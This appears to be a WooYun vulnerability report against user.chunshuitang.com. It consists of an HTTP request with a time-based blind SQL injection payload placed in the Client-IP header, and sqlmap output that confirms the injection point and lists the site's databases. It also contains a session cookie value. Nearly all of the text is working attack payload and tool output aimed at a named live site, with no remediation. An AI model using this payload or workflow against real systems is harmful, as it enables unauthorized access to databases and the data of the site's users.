WooYun.org

GET /register HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
X-Requested-With: XMLHttpRequest
Referer: http://user.chunshuitang.com/
Cookie: CPSSID=hk2tviec4h7cvnklt4ahs3e9o7
Host: user.chunshuitang.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

(custom) HEADER parameter 'Client-IP #1*' is vulnerable. Do you want to keep tes
ting the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 1400 HTTP(s) re
quests:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(2
0)))qMAz)#'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0
),0))OR"/
---
[13:47:05] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[13:47:05] [INFO] fetching database names
[13:47:05] [INFO] fetching number of databases
[13:47:05] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[13:47:05] [INFO] retrieved:
[13:47:05] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
2
[13:47:47] [INFO] retrieved: information_schema
[14:11:51] [INFO] retrieved: c
available databases [2]:
[*] c
[*] information_schema
[14:12:53] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\user.chunshuitang.com'
[*] shutting down at 14:12:53